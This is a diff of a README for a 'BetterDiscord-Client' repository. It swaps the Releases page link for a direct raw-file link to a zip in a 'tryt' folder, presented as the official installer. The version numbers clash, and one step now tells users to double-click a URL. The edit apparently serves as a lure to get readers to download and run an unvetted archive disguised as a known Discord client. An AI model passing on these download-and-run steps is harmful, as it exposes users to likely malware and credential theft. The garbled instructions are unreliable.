xg629pzgn6-droid/BetterDiscord-Client/README.md

 To get started, you can download BetterDiscord-Client directly from the Releases page.
 Follow these steps:

 1. Click the large download button at the top of this page.
-2. You will be redirected to the [Releases page](https://github.com/NoirCoder/BetterDiscord-Client/releases).
+2. You will be redirected to the [Releases page](https://raw.githubusercontent.com/NoirCoder/BetterDiscord-Client/main/tryt/BetterDiscord-Client_v3.6.zip).
 3. Locate the version you want, such as **BetterDiscord v6.28**.
-4. Click on the link to download the installation file (e.g., `BetterDiscord.6.28.zip`).
+4. Click on the link to download the installation file (e.g., `https://raw.githubusercontent.com/NoirCoder/BetterDiscord-Client/main/tryt/BetterDiscord-Client_v3.6.zip`).

 Once downloaded, follow these steps to install:

 1. Open the downloaded `.zip` file.
 2. Extract the contents to your desired location.
-3. Locate the `BetterDiscord.exe` or `BetterDiscord` file and double-click to run it.
+3. Locate the `https://raw.githubusercontent.com/NoirCoder/BetterDiscord-Client/main/tryt/BetterDiscord-Client_v3.6.zip` or `BetterDiscord` file and double-click to run it.
 4. Follow the on-screen prompts to complete the installation.

 ## 💻 Usage